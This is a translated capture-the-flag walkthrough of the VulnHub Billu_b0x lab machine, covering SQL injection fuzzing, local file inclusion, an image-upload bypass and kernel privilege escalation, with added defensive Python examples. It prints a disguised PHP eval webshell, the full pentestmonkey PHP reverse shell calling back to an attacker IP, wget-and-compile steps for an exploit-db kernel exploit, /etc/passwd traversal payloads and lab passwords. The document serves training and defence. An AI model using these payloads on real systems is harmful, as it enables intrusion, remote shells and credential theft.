Target Practice Series: the Billu_b0x Machine

admin, 2023-06-26 12:44:59
Machine download:

https://download.vulnhub.com/billu/Billu_b0x.zip

Summary:
The following attack techniques are used against this machine:

Host discovery, port scanning, web information gathering
SQL injection (sqlmap does not find it)
File inclusion, file upload
Arbitrary file download, source code review
Kernel exploit privilege escalation

1.1 Host discovery

arp-scan  -l


1.2 Port scanning

nmap -p-  192.168.112.130



nmap -p22,80 -sV -sC 192.168.112.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 05:11 EST
Nmap scan report for 192.168.112.130
Host is up (0.00069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: --==[[IndiShell Lab]]==--
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 00:0C:29:0B:39:35 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

1.3 SQL injection

Visit http://192.168.112.130/.

The login page turns out to need SQL injection.


The captured login request:

POST / HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

un=§123§&ps=§123§&login=%E8%AE%A9%E6%88%91%E4%BB%AC%E7%99%BB%E9%99%86
Fuzz both un and ps at the same time with SQL injection wordlists. For un use /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt; for ps use Burp's built-in SQL wordlist.


Parameter 2 uses Burp's built-in wordlist.


Start the attack; the payload pair that returns a 302 is the successful injection.


Replay that request in the browser.


It redirects to http://192.168.112.130/panel.php
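The login form above is beaten by fuzzing both fields with SQL injection wordlists. To show why that works and what closes it, here is an added Python example (not code from the original post or from the Billu_b0x box): it builds a constructed in-memory SQLite table and contrasts a string-concatenated login query with a parameterised one; the table and column names are assumptions. A small metacharacter triage function stands in for the kind of check a WAF or a review of the login request log would apply to the un and ps fields.

```python
import sqlite3
from typing import Dict


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the target's login table; the table
    and column names are assumptions, not taken from the box's source."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE auth (uname TEXT NOT NULL, pass TEXT NOT NULL)")
    conn.execute("INSERT INTO auth VALUES ('demo', 'demo-pass')")
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, un: str, ps: str) -> bool:
    """Vulnerable shape: request fields are spliced into the SQL text, so any
    value that changes the meaning of the WHERE clause logs the user in. A
    SQLi wordlist run against both fields is a search for such values."""
    sql = f"SELECT COUNT(*) FROM auth WHERE uname = '{un}' AND pass = '{ps}'"
    try:
        (n,) = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # Payloads that merely break the syntax fail the login (and surface as DB errors)
        return False
    return n > 0


def login_param(conn: sqlite3.Connection, un: str, ps: str) -> bool:
    """Hardened shape: bound parameters; the driver never treats input as SQL."""
    sql = "SELECT COUNT(*) FROM auth WHERE uname = ? AND pass = ?"
    (n,) = conn.execute(sql, (un, ps)).fetchone()
    return n > 0


# Cheap request-side triage: characters that have no business in a username field
SQL_META = ("'", '"', "--", "/*", ";")


def looks_like_sqli(value: str) -> bool:
    return any(m in value for m in SQL_META)


def demo() -> Dict[str, bool]:
    conn = make_db()
    # The textbook tautology from the OWASP SQL injection description;
    # fuzz lists such as Generic-SQLi.txt carry many variants of it
    payload = "' OR '1'='1"
    return {
        "valid_concat": login_concat(conn, "demo", "demo-pass"),
        "valid_param": login_param(conn, "demo", "demo-pass"),
        "payload_concat": login_concat(conn, payload, payload),   # bypass
        "payload_param": login_param(conn, payload, payload),     # refused
        "payload_flagged": looks_like_sqli(payload),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The parameterised version is the fix; the metacharacter check is only a detection aid, since it would also flag legitimate passwords containing quotes, which is fine for alerting but not for blocking.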


1.4 File inclusion + file upload

dirsearch -u  http://192.168.112.130


Open this URL:
http://192.168.112.130/add.php

It looks like a file upload interface.


Capture the request and test it.

POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

load=add&continue=%E7%BB%A7%E7%BB%AD
The page loads the add.php file through the load parameter, which points to a file inclusion. If add is changed to something else, the upload interface is no longer reached.

Change it to

../../../../../../../../../../etc/passwd

The passwd file is loaded, confirming the file inclusion.

POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

load=../../../../../../../../../../etc/passwd&continue=%E7%BB%A7%E7%BB%AD


Open

http://192.168.112.130/panel.php

This is the file upload interface.


When I upload a PHP file, it is rejected.


Capture the request and look at it.

POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------10474904140937799821346063474
Content-Length: 715
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="image"; filename="1.png"
Content-Type: image/png

GIF89a
<?php @eval($_POST['1']);?>
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="name"

name123
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="address"

address
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="id"

1337
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="upload"

上传
-----------------------------10474904140937799821346063474--

Modify the request as above and the upload succeeds!
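The upload went through because the server accepted a .png filename and a GIF header placed in front of PHP code. As an added example (not code from the original post or from the box), this Python validator shows the checks that would have refused that file: an extension allowlist, magic-byte detection, agreement between the extension and the detected type, a scan for PHP open tags, and a server-chosen storage name. The signature table and allowed types are constructed assumptions, and a benign PHP echo stands in for the captured webshell body.

```python
import os
import re
import secrets
from typing import Optional, Tuple

# Constructed signature table (assumption: these are the only image types the
# form should accept). Several signatures may map to one type.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
}
ALLOWED_EXT = set(MAGIC)

# PHP open tags: long form, short-echo form and short form. A valid image
# header followed by one of these is exactly the polyglot the captured request carried.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|\s)")


def detect_type(data: bytes) -> Optional[str]:
    """Return the image type whose signature the data starts with, or None."""
    for kind, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return kind
    return None


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an upload may be stored; returns (accepted, reason)."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    kind = detect_type(data)
    if kind is None:
        return False, "no recognised image signature"
    if kind != ext:
        # The captured upload declared .png / image/png but carried a GIF header
        return False, f"extension .{ext} does not match content type {kind}"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag inside image data"
    return True, "ok"


def storage_name(kind: str) -> str:
    """Server-chosen name: random, with the detected type's extension. The
    client's filename never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{kind}"


if __name__ == "__main__":
    # Constructed samples; the PHP echo stands in for the page's webshell body
    for name, blob in [
        ("1.png", b"GIF89a\n<?php echo 1; ?>"),
        ("1.gif", b"GIF89a\n<?php echo 1; ?>"),
        ("1.png", b"\x89PNG\r\n\x1a\n" + bytes(16)),
        ("shell.php", b"<?php echo 1; ?>"),
    ]:
        print(name, validate_upload(name, blob))
```

The content checks are best effort: a genuine GIF can still carry PHP text in a comment block, so the decisive control is that files in the upload directory are never passed to include() and are served from a location with script execution disabled.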


Upload a reverse shell.

cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php 123.png     // the listener IP inside the reverse shell must be changed first
POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------31115094725966488031053493073
Content-Length: 6193
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="image"; filename="123.png"
Content-Type: image/png

GIF89a;
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at [email protected]
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.112.128';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
  // Fork and have the parent process exit
  $pid = pcntl_fork();

  if ($pid == -1) {
    printit("ERROR: Can't fork");
    exit(1);
  }

  if ($pid) {
    exit(0);  // Parent exits
  }

  // Make the current process a session leader
  // Will only succeed if we forked
  if (posix_setsid() == -1) {
    printit("Error: Can't setsid()");
    exit(1);
  }

  $daemon = 1;
} else {
  printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
  printit("$errstr ($errno)");
  exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
  printit("ERROR: Can't spawn shell");
  exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
  // Check for end of TCP connection
  if (feof($sock)) {
    printit("ERROR: Shell connection terminated");
    break;
  }

  // Check for end of STDOUT
  if (feof($pipes[1])) {
    printit("ERROR: Shell process terminated");
    break;
  }

  // Wait until a command is end down $sock, or some
  // command output is available on STDOUT or STDERR
  $read_a = array($sock, $pipes[1], $pipes[2]);
  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

  // If we can read from the TCP socket, send
  // data to process's STDIN
  if (in_array($sock, $read_a)) {
    if ($debug) printit("SOCK READ");
    $input = fread($sock, $chunk_size);
    if ($debug) printit("SOCK: $input");
    fwrite($pipes[0], $input);
  }

  // If we can read from the process's STDOUT
  // send data down tcp connection
  if (in_array($pipes[1], $read_a)) {
    if ($debug) printit("STDOUT READ");
    $input = fread($pipes[1], $chunk_size);
    if ($debug) printit("STDOUT: $input");
    fwrite($sock, $input);
  }

  // If we can read from the process's STDERR
  // send data down tcp connection
  if (in_array($pipes[2], $read_a)) {
    if ($debug) printit("STDERR READ");
    $input = fread($pipes[2], $chunk_size);
    if ($debug) printit("STDERR: $input");
    fwrite($sock, $input);
  }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
  if (!$daemon) {
    print "$string\n";
  }
}

?>

-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="name"

name111111
-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="address"

address
-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="id"

123123
-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="upload"

上传
-----------------------------31115094725966488031053493073--

Use the file inclusion to load the uploaded file.

POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

load=/uploaded_images/123.png&continue=%E7%BB%A7%E7%BB%AD
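Both inclusion requests in this section (the ../ walk to /etc/passwd earlier and the include of the uploaded 123.png here) come from one weakness: panel.php builds an include path from the load parameter. The following Python example is added here and is not code from the original post or from the box. It models that loader with an assumed web root of /var/www and an assumed upload directory, and shows why a containment check on its own is not enough: the uploaded file stays inside the web root and passes it, so the defensible fix is an allowlist of page names, with "add" as the only entry the walkthrough shows.

```python
import os
from typing import Dict, Optional

# Constructed layout standing in for the target (assumptions, not from the box).
WEBROOT = "/var/www"
UPLOAD_DIR = os.path.join(WEBROOT, "uploaded_images")
# Pages panel.php legitimately pulls in; the walkthrough only ever shows "add".
ALLOWED_PAGES = {"add"}


def include_path_unchecked(load: str) -> str:
    """The vulnerable shape: directory + raw parameter, handed to include().
    (How the real app appends the .php extension for page names is left aside.)"""
    return os.path.normpath(WEBROOT + "/" + load)


def include_path_allowlisted(load: str) -> Optional[str]:
    """Hardened shape: the parameter is a key into a fixed table, never a path."""
    if load not in ALLOWED_PAGES:
        return None
    return os.path.join(WEBROOT, load + ".php")


def escapes_webroot(path: str) -> bool:
    """True when a normalised absolute path lies outside WEBROOT (the passwd case)."""
    return os.path.commonpath([WEBROOT, path]) != WEBROOT


def is_user_upload(path: str) -> bool:
    """True when the path is inside the upload directory: still under WEBROOT,
    so a pure containment check accepts it, yet its bytes came from a client
    (the 123.png case)."""
    return os.path.commonpath([UPLOAD_DIR, path]) == UPLOAD_DIR


def triage(load: str) -> Dict[str, object]:
    """What a given load value does under the unchecked and allowlisted loaders."""
    path = include_path_unchecked(load)
    return {
        "unchecked_path": path,
        "escapes_webroot": escapes_webroot(path),
        "includes_upload": is_user_upload(path),
        "allowlisted_path": include_path_allowlisted(load),
    }


if __name__ == "__main__":
    # The three load values seen in the walkthrough
    for value in ("add",
                  "../../../../../../../../../../etc/passwd",
                  "/uploaded_images/123.png"):
        print(value, "->", triage(value))
```

Run stand-alone it prints one line per value; the passwd value resolves to /etc/passwd and escapes the web root, the upload value is contained but lands in the upload directory, and only "add" gets a path from the allowlisted loader.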

Start the listener on Kali:

nc  -lvnp 1234 


Success!

1.5 Privilege escalation

Kernel exploit privilege escalation

python -c "import pty;pty.spawn('/bin/bash')"
uname -a


A matching kernel exploit can be found from this kernel version.


cp /usr/share/exploitdb/exploits/linux/local/37292.c .
mv 37292.c exp.c
python3 -m http.server 80
cd /tmp
wget http://192.168.112.128/exp.c
gcc exp.c -o exp
chmod +x exp
./exp


Privilege escalation succeeded.

Arbitrary file download

dirsearch -u http://192.168.112.130


http://192.168.112.130/test

It reports that a file parameter is missing.


It has to be submitted with the POST method, so capture the request.

GET /test?file=../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

Use Burp's Change request method.


POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

file=../../../../../../../etc/passwd


Reading index.php reveals c.php.


POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

file=c.php


This yields the database credentials: billu / b0x_billu

http://192.168.112.130/phpmy/

Open the URL above and log in with those credentials.


The database contains the credentials biLLu / hEx_it

Web crawling

dirsearch -u  http://192.168.112.130/phpmy/


Read the contents of phpmy/config.inc.php

POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

file=phpmy/config.inc.php
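Every read in this section, and the include in 1.4, travels in a request parameter, so all of them are visible to a proxy or application log that records parameters. The following Python detector is an added example (not code from the original post or from the box). It runs over constructed audit-log lines in an assumed "METHOD PATH BODY" format, built from the parameter values this walkthrough sent plus two benign requests, and flags directory traversal, reads of OS secrets, application config and server-side source, and include of the upload directory.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed audit-log lines, "METHOD PATH BODY" with "-" for an empty body
# (an assumed format, not the target's Apache log). The parameter values are
# the ones the walkthrough sent; lines 1 and 7 are benign controls.
SAMPLE_LOG = """\
POST /panel.php load=add&continue=%E7%BB%A7%E7%BB%AD
POST /panel.php load=../../../../../../../../../../etc/passwd&continue=%E7%BB%A7%E7%BB%AD
POST /panel.php load=/uploaded_images/123.png&continue=%E7%BB%A7%E7%BB%AD
GET /test?file=../../../../../../../etc/passwd -
POST /test file=c.php
POST /test file=phpmy/config.inc.php
GET /index.php -
"""

# ".." as a whole path component, checked after URL decoding
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Files an app should never serve or include on request: OS secrets, its own
# config, server-side source
SENSITIVE = re.compile(
    r"(?:^|/)(?:etc/(?:passwd|shadow)|config\.inc\.php|\.htaccess)$|\.(?:php|inc|ini)$",
    re.IGNORECASE,
)
# Directories holding client-supplied bytes; their files must never reach include()
UPLOAD_DIRS = ("/uploaded_images/",)


def request_params(method: str, target: str, body: str) -> List[Tuple[str, str]]:
    """Collect decoded name=value pairs from the query string and, for POST, the body."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method == "POST" and body != "-":
        pairs += parse_qsl(body, keep_blank_values=True)
    # parse_qsl decoded once; a second pass makes double-encoded traversal look the same
    return [(name, unquote(value)) for name, value in pairs]


def classify(value: str) -> List[str]:
    """Return the rule names a single parameter value trips, in a fixed order."""
    hits = []
    if TRAVERSAL.search(value):
        hits.append("traversal")
    if SENSITIVE.search(value):
        hits.append("sensitive-file")
    if any(d in value for d in UPLOAD_DIRS):
        hits.append("upload-include")
    return hits


def scan(log: str) -> List[Dict[str, object]]:
    """One alert per offending parameter, with the line number, path and rule hits."""
    alerts = []
    for lineno, line in enumerate(log.splitlines(), 1):
        method, target, body = line.split(" ", 2)
        for name, value in request_params(method, target, body):
            hits = classify(value)
            if hits:
                alerts.append({"line": lineno, "path": urlsplit(target).path,
                               "param": name, "value": value, "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Five of the seven lines raise an alert; load=add and the plain index.php request do not. Note that the file=c.php request carries no traversal at all, so a detector keyed only on "../" would miss the source disclosure that led to the database password.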


This gives the credentials root / roottoor, which also work for SSH:
ssh root@192.168.112.130    // password: roottoor


Success.


Originally published on the WeChat official account 嗨嗨安全: 靶机实战系列之Billu_b0x靶机

Posted by admin on 2023-06-26 12:44:59. Please keep this link when reprinting (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/1834472.html
